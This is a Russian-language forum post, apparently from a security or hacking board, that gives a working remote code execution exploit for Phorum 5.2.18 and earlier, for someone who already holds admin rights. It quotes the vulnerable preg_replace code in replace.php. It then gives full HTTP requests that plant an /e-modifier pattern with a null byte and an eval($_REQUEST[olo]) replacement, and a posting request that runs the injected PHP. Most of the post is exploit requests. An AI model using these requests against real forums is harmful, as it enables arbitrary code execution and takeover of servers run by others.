Показать сообщение отдельно
Старый 25.06.2012, 14:59   #32
c411k
 
Регистрация: 17.07.2010
Сообщений: 27
Репутация: 29
По умолчанию

// phorum <= 5.2.18 preg_replace RCE
// need admin priv
// by me

phorum/mods/replace/replace.php
PHP код:
foreach($PHORUM["mod_replace"] as $entry){

    
$entry["replace"]=str_replace(array("<"">"), array("<"">"), $entry["replace"]);
    
    if(
$entry["pcre"]){
        
$body=preg_replace("/$entry[search]/is"$entry["replace"], $body);
    } else {
        
$body=str_replace($entry["search"], "$entry[replace]"$body);
    }

1. phorum/admin.php?module=mods
Simple Text Replacement Mod ON

2. phorum/admin.php?module=modsettings&mod=replace

POST!
Код:
POST http://localhost/phorum/admin.php
Host: localhost
Cookie:phorum_admin_session=*******
Content-Type: application/x-www-form-urlencoded

module=modsettings&mod=replace&curr=0&search=rdot/e%00&replace=eval($_REQUEST[olo])&pcre=1
3. phorum/posting.php

POST
Код:
POST http://localhost/phorum/admin.php
Host: localhost
Cookie:phorum_admin_session=*******; phorum_session_v5=**********;
Content-Type: multipart/form-data; boundary=---------------------------114782935826962

-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="forum_id"\r\n
\r\n
2\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="message_id"\r\n
\r\n
0\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="message_id:signature"\r\n
\r\n
f75fe9fb4c4e241fdfe02c04a7e70937\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="user_id"\r\n
\r\n
1\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="datestamp"\r\n
\r\n
\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="status"\r\n
\r\n
0\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="author"\r\n
\r\n
lol\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="email"\r\n
\r\n
\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="forum_id"\r\n
\r\n
2\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="thread"\r\n
\r\n
1\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="parent_id"\r\n
\r\n
1\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="allow_reply"\r\n
\r\n
1\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="special"\r\n
\r\n
\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="attachments"\r\n
\r\n
YTowOnt9\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="attachments:signature"\r\n
\r\n
ea7531271623877e68eaa92900f8d548\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="meta"\r\n
\r\n
YTowOnt9\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="meta:signature"\r\n
\r\n
ea7531271623877e68eaa92900f8d548\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="thread_count"\r\n
\r\n
0\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="mode"\r\n
\r\n
reply\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="subject"\r\n
\r\n
Re: Test Message\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="body"\r\n
\r\n
rdot\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="olo"\r\n
\r\n
phpinfo();\r\n-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="preview"\r\n
\r\n
 Preview \r\n
-----------------------------114782935826962--\r\n
c411k вне форума   Ответить с цитированием